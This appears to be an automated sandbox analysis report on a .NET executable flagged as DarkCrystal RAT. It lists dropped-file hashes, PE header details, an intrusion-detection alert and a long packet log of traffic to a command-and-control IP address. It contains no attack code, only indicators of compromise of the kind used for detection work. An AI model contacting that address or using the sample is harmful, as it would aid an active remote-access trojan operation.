                                                                                                                              SHA1:7D485E9A0B90F41165EE172EDBB4060FB53BF365
                                                                                                                              SHA-256:2726F766572B0CD819EDDB64C8D8D8FACA3D326E671626C4A031463D8CB37BFD
                                                                                                                              SHA-512:FF377BCD8A6B90E5E9D13620ADD96110473F4C1C0558744B8161680E1BC5EBDC4BC9CC9BBEA55039F0C39856FF301B7968480FE04A26E9F22892C60B96E76401
                                                                                                                              Malicious:false
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):280
                                                                                                                              Entropy (8bit):5.815524227334601
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:zJC7kkwMt7oS2iPlvdDG9YEfuO6uKYmSPSl2xnaQXog3JC:zJC78MqS7VDGP76uJPdRUgI
                                                                                                                              MD5:3CA8E6718E47252A98E4FF2FE4CB7985
                                                                                                                              SHA1:997850CF42CCDE8DFB45B082F4FA16E7761DF84F
                                                                                                                              SHA-256:42398B9FA940037027AC56AEE852D4E6465B91D68C38DD9E13232B66AF806103
                                                                                                                              SHA-512:78EFCB76A8BA8BC5210F1059C3250B91AD27B1E2572281D6E71EE5F498E1766BDC4078495CD934335C23E0139093486A9E92A57EDD5C83FA6E580A9FE507FF7F
                                                                                                                              Malicious:false
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3163910
                                                                                                                              Entropy (8bit):7.992391848855575
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:49152:ILfoFX5SJqMr60Ag4ErCKLYy3XxggNblydYuwVHlizQ/U4oiUT6JgcBKMzWpwneR:8AkqMrv4ErCKbfl/uwVHlNlzQUWWeWC
                                                                                                                              MD5:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              SHA1:9571472C5D0899E517E1C1F84C6C05DFD2ABB2B5
                                                                                                                              SHA-256:9C2AD3D80258AF2508987D952DD5A7744BEDBDD16260E4F76412EA6696774285
                                                                                                                              SHA-512:439D108D086E6231513A7D40E01EA9C8D1B0D9948C9412F2828F694D94CCFA64E98D8A6956464CCCB632BB072AAE4E3C00154733BC3AF97A11CD7A57F0B0FB10
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):26
                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                              Malicious:true
                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3163910
                                                                                                                              Entropy (8bit):7.992391848855575
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:49152:ILfoFX5SJqMr60Ag4ErCKLYy3XxggNblydYuwVHlizQ/U4oiUT6JgcBKMzWpwneR:8AkqMrv4ErCKbfl/uwVHlNlzQUWWeWC
                                                                                                                              MD5:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              SHA1:9571472C5D0899E517E1C1F84C6C05DFD2ABB2B5
                                                                                                                              SHA-256:9C2AD3D80258AF2508987D952DD5A7744BEDBDD16260E4F76412EA6696774285
                                                                                                                              SHA-512:439D108D086E6231513A7D40E01EA9C8D1B0D9948C9412F2828F694D94CCFA64E98D8A6956464CCCB632BB072AAE4E3C00154733BC3AF97A11CD7A57F0B0FB10
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):26
                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                              Malicious:false
                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with very long lines (818), with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):818
                                                                                                                              Entropy (8bit):5.924016653700528
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:EUUoOPyb8v/TDn9szFLDoYzKsyhN6iD9oCjmugpKQ9tL:EUUoO6b49szBoYGFhnDxmfNj
                                                                                                                              MD5:EF2F3027760FB88DB2C9FB587BA69B41
                                                                                                                              SHA1:E72B069DCF6AA7FD60397E4D7D18714EF47FED21
                                                                                                                              SHA-256:3C7AB06B4E292DA5A03933BA42988FB07B8CF3AED269C6C6D0C0BF43C925C21F
                                                                                                                              SHA-512:26054CC58E36961D99DBA1C67005DAE5C8DD7636BB1D4CD47F99F42CD9FD7791C3DE80EC5437264D7E60225382F72AB21D0EDDB1A3BF18546E7079E386052BAF
                                                                                                                              Malicious:false
                                                                                                                              Process:C:\Windows\System32\w32tm.exe
                                                                                                                              File Type:ASCII text
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):151
                                                                                                                              Entropy (8bit):4.824038610531724
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:VLV993J+miJWEoJ8FXlaKy6XaNvo41Nvj:Vx993DEUaLV47
                                                                                                                              MD5:0AB6577C3D92C4724BAB09B2D4A421AB
                                                                                                                              SHA1:B7AA3111CD54B430AC00FA77711302DE7361F5A8
                                                                                                                              SHA-256:FA98CFC4659B678A5121398475A403A1F2742ABCF8038262D072733EEA44352F
                                                                                                                              SHA-512:D43040B6ECE1D4F9282A965EE8B7A6FF04DD8A48273B2F6541D0D7C1D445CCF07B9E60987446D7E18A297FA0B0AB7F6800A5CF45B60967500FD5009FEE182537
                                                                                                                              Malicious:false
                                                                                                                              Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 26/12/2024 13:04:34..13:04:34, error: 0x80072746.13:04:39, error: 0x80072746.
                                                                                                                              File type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                                                                              Entropy (8bit):7.992391848855575
                                                                                                                              TrID:
                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                              File name:Z4D3XAZ2jB.exe
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5:0a5d9cd0a4b6abdbb272262811774a8d
                                                                                                                              SHA1:9571472c5d0899e517e1c1f84c6c05dfd2abb2b5
                                                                                                                              SHA256:9c2ad3d80258af2508987d952dd5a7744bedbdd16260e4f76412ea6696774285
                                                                                                                              SHA512:439d108d086e6231513a7d40e01ea9c8d1b0d9948c9412f2828f694d94ccfa64e98d8a6956464cccb632bb072aae4e3c00154733bc3af97a11cd7a57f0b0fb10
                                                                                                                              SSDEEP:49152:ILfoFX5SJqMr60Ag4ErCKLYy3XxggNblydYuwVHlizQ/U4oiUT6JgcBKMzWpwneR:8AkqMrv4ErCKbfl/uwVHlNlzQUWWeWC
                                                                                                                              TLSH:97E533C19638C452EEAE2A76E501804FA17CBBA04D4D4D3F73E153DFD9B74E685ACA02
                                                                                                                              File Content Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@..p....................`.............................
                                                                                                                              Icon Hash:90cececece8e8eb0
                                                                                                                              Entrypoint:0x402e5e
                                                                                                                              Entrypoint Section:.text
                                                                                                                              Digitally signed:false
                                                                                                                              Imagebase:0x400000
                                                                                                                              Subsystem:windows gui
                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                              Time Stamp:0x4D0126C5 [Thu Dec 9 18:58:13 2010 UTC]
                                                                                                                              TLS Callbacks:
                                                                                                                              CLR (.Net) Version:
                                                                                                                              OS Version Major:4
                                                                                                                              OS Version Minor:0
                                                                                                                              File Version Major:4
                                                                                                                              File Version Minor:0
                                                                                                                              Subsystem Version Major:4
                                                                                                                              Subsystem Version Minor:0
                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                              Instruction
                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e0c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0x370 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xe64 | 0x1000 | 6b17f20c45d1294fc266eb14df869af7 | False | 0.552978515625 | data | 5.315832583359095 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x4000 | 0x370 | 0x400 | 84c5330df637369dd4da3d84a91b8d66 | False | 0.3759765625 | data | 2.854832632722979 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6000 | 0xc | 0x200 | bdc0546adfb3b2dd2fed0ee2248951a7 | False | 1.005859375 | data | 6.526889622005003 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x4058 | 0x318 | data | | | 0.44823232323232326
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-26T17:17:12.161494+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49730 | 104.21.93.162 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                              Dec 26, 2024 17:17:14.099111080 CET4973180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:14.180829048 CET4973080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:14.647872925 CET4973080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:14.648757935 CET4973580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:14.678751945 CET4973180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:14.767754078 CET8049730104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:14.767808914 CET4973080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:14.768316031 CET8049735104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:14.768404961 CET4973580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:14.768544912 CET4973580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:14.798758984 CET8049731104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:14.798851013 CET4973180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:14.888022900 CET8049735104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:14.967722893 CET4973680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:15.036266088 CET4973580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:15.087363005 CET8049736104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:15.087421894 CET4973680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:15.087529898 CET4973680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:15.193871975 CET4973880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:15.199681044 CET8049735104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:15.206943035 CET8049736104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:15.314383030 CET8049738104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:15.314455986 CET4973880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:15.314666033 CET4973880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:15.434160948 CET8049738104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:15.443037987 CET4973680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:15.563760996 CET8049736104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:15.563800097 CET8049736104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:15.670962095 CET4973880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:15.738765955 CET8049735104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:15.738822937 CET4973580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:15.790544987 CET8049738104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:15.790563107 CET8049738104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:15.790611982 CET8049738104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:16.264548063 CET8049736104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:16.411495924 CET4973680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:16.492837906 CET8049738104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:16.545506954 CET8049736104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:16.599003077 CET4973680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:16.661506891 CET4973880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:16.752651930 CET8049738104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:16.962876081 CET8049738104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:16.962925911 CET4973880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:17.482254982 CET4973680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:17.482315063 CET4973880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:17.484941006 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:17.574867010 CET4974180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:17.602263927 CET8049736104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:17.602332115 CET4973680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:17.602722883 CET8049738104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:17.602761030 CET4973880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:17.604527950 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:17.604589939 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:17.604784966 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:17.695684910 CET8049741104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:17.695765018 CET4974180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:17.695915937 CET4974180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:17.726121902 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:17.815511942 CET8049741104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:17.958554029 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:18.052509069 CET4974180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:18.080580950 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:18.080641031 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:18.080682993 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:18.172214031 CET8049741104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:18.172401905 CET8049741104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:18.784296036 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:18.874296904 CET8049741104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:18.974240065 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.038444996 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.099021912 CET4974180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.126353025 CET8049741104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.208378077 CET4974180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.270883083 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.285165071 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.372037888 CET4974180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.374177933 CET4974580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.404721975 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.492584944 CET8049741104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.492714882 CET4974180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.494355917 CET8049745104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.494478941 CET4974580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.501445055 CET4974580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.617876053 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.620965004 CET8049745104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.626833916 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.747658968 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.747677088 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.747709036 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.747725010 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.747776031 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.747850895 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.747889042 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.748013973 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.748019934 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.748045921 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.748074055 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.748112917 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.748176098 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.748187065 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.748241901 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.748250961 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.748265028 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.748481035 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.867444992 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.867489100 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.867589951 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.867664099 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.867795944 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.867876053 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.867994070 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.868036032 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.868063927 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.868089914 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.868235111 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.868266106 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.868299961 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.868321896 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.868412971 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.868426085 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.868499041 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.962798119 CET4974580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.987222910 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.987323046 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.987448931 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.987652063 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.987723112 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.987790108 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.987838984 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.987919092 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.987967014 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.988060951 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988095045 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988106966 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988158941 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988238096 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988456011 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988467932 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988517046 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988528967 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988573074 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988600969 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988615990 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988629103 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:31.637450933 CET8049757104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:31.637768984 CET8049757104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:31.972302914 CET8049756104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:32.020896912 CET4975680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:32.069612026 CET8049757104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:32.114834070 CET4975780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:32.238660097 CET8049756104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:32.286511898 CET4975680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:32.322053909 CET8049757104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:32.360115051 CET4975680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:32.360161066 CET4975780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:32.360836983 CET4975880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:32.480097055 CET8049756104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:32.480154991 CET4975680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:32.480492115 CET8049758104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:32.480552912 CET4975880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:32.480612993 CET8049757104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:32.480707884 CET4975780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:32.480792046 CET4975880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:32.606611967 CET8049758104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:32.833529949 CET4975880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:32.953466892 CET8049758104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:32.953514099 CET8049758104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:32.953547955 CET8049758104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:33.334677935 CET4975980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:33.335572958 CET4975880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:33.454880953 CET8049759104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:33.454984903 CET4975980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:33.455077887 CET4975980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:33.455463886 CET4976080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:33.455809116 CET8049758104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:33.455874920 CET4975880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:33.574877024 CET8049759104.21.93.162192.168.2.4
